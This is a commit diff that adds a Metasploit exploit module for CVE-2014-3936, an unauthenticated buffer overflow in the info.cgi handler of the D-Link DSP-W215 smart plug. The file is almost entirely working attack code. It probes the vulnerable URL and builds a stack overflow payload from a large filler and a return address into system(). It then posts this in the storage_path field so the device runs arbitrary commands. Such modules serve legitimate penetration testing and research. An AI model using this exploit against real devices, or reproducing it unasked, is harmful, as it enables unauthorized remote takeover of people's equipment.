dlink_dspw215_info_cgi_rop

Michael Messner · Michael Messner · commit f89f47c4d085 · 2014-07-08T22:29:57.000+02:00
diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_rop.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_rop.rb
@@ -0,0 +1,111 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link info.cgi Buffer Overflow in POST Request',
+      'Description'    => %q{
+          This module exploits an anonymous remote code execution vulnerability on different D-Link devices.
+        This module has been successfully tested on D-Link DSP-W215 in an emulated environment.
+      },
+      'Author'         =>
+        [
+          'Craig Heffner',   # vulnerability discovery and initial PoC
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['linux'],
+      'Arch'           => ARCH_MIPSBE,
+      'References'     =>
+        [
+          [ 'CVE', '2014-3936' ],
+          [ 'BID', '67651' ],
+          [ 'URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/' ], # blog post from Craig including PoC
+          [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ]
+        ],
+      'Targets'        =>
+        [
+          [ 'D-Link DSP-W215',
+            {
+              'Offset'      => 477472,
+              'Ret'         => "\x00\x40\x5C\xEC",    # jump to system - my_cgi.cgi
+            }
+          ]
+        ],
+      'DisclosureDate' => 'May 22 2014',
+      'DefaultTarget' => 0))
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => "/common/info.cgi",
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code)
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 185
+    )
+  end
+
+  def prepare_shellcode(cmd)
+    buf = rand_text_alpha_upper(target['Offset'])   # Stack filler
+    buf << target['Ret']                            # Overwrite $ra -> jump to system
+
+           # la $t9, system
+           # la $s1, 0x440000
+           # jalr $t9 ; system
+           # addiu $a0, $sp, 0x28 # our command
+
+    buf << rand_text_alpha_upper(40)                # Command to execute must be at $sp+0x28
+    buf << cmd                                      # Command to execute
+    buf << "\x00"                                   # NULL terminate the command
+  end
+
+  def execute_command(cmd, opts)
+    shellcode = prepare_shellcode(cmd)
+
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => "/common/info.cgi",
+        'encode_params' => false,
+        'vars_post' => {
+          'storage_path' => shellcode,
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end
